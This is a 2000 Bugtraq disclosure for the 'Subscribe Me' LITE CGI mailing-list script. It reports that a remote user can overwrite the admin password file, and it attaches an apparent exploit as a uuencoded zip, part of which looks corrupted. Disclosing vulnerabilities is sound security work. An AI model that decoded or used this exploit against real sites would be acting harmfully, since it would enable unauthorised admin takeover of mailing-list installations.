Date:         Wed, 23 Aug 2000 19:06:29 -0700
From: n30 <n30@ALLDAS.DE>
Subject:      Subscribe Me Vulnerability
To: BUGTRAQ@SECURITYFOCUS.COM

Product: Subscribe Me
Versions: ALL version numbers LITE only
OS: Unix and Winnt
Vendor: Notified, http://www.cgiscriptcenter.com/

The Problem:

    Yet again the script allows a remote user to overwrite the Admin Passwd file with
any password they see fit. Therefore giving them Admin access to the Maillist Script

Exploit:

    See the .zip file Attached

Patches:

    Already Available see website, download version is patched.

n30
n30@alldas.de
www.alldas.de





begin 666 sploit.zip
M4$L#!!0``@`(`%!T%RDZ3)<F,P(``/<%```,````17AP;&]I="YH=&ULK53;
M;IM $'VOU'\8;5\30],^68"*[;6-9"Z"=:ST;0WK>B5@$:SCYN^SZP#!;M*F
MDI% S&AN9\[,6'M9Y,[G3]8\C'UPI\0+`QOMI:S&AG$\'D?I+]ZD-:]DRDK)
MZE$J"D/I;K>\-)K#MJI%Q@JA?[79EHVJ'(&/R3*<V2@*$X)4=%"/-<4!P;%C
M3>).0]S)"L,DC&<XMI&)8./-R-)&WTVS\])6DW#V,!#C_E]+LX$TT$<JCZ-
M!03F[A3;Z)'5&2WI#=":T_P&]BQ_9)*G%+5FTW 5JBJ^S.>FJ?,G':+7J `^
M@Y5'L&5H%P<22>6A&8.;%;R$B#;-4=09)$S"_2$O64VW/.?R"?#O*A=<MGZ6
MH6HSHB&.KCG_4?%EP>4WLX_?ACMOR"EVXOU4L6^_HG]GB7)&&P8GWD'N&01X
M,X ZAE&?[RTL0Y8NB':&/;T@^$^26Z+!77D+-9RQMUBJJ;*\(%H3( ^10A&Y
M2;)1X1$$KJ_DZI@I"^-L.KIY.>O#W0?Z4+6\]F@OPBI%?/7R[ZY7?RK*':\+
M*KDHKX/AA6$TV.7>: @K64]\CW2@&B8U+7#OKM9*A-.:]#L#[^/]>Y(8)[C/
M@=Y!ICX70Z8T>BA?=^7,\0VGSN%T*P/RTO^/K)$^1 H"$ %KM4Z^R/CN"1)Q
MJ%.FE9'@I00I8'A#091 W'B!%=.L5M%!QSB]%/8UV]FHH#R78JS6_@?-\XPV
MHXPA1VMO"V89= A-7W==N=&>^V=02P$"% `4``(`" !0=!<I.DR7)C,"``#W
M!0``# `````````!`" `MH$`````17AP;&]I="YH=&UL4$L%!@`````!``$`
*.@```%T"````````
`
end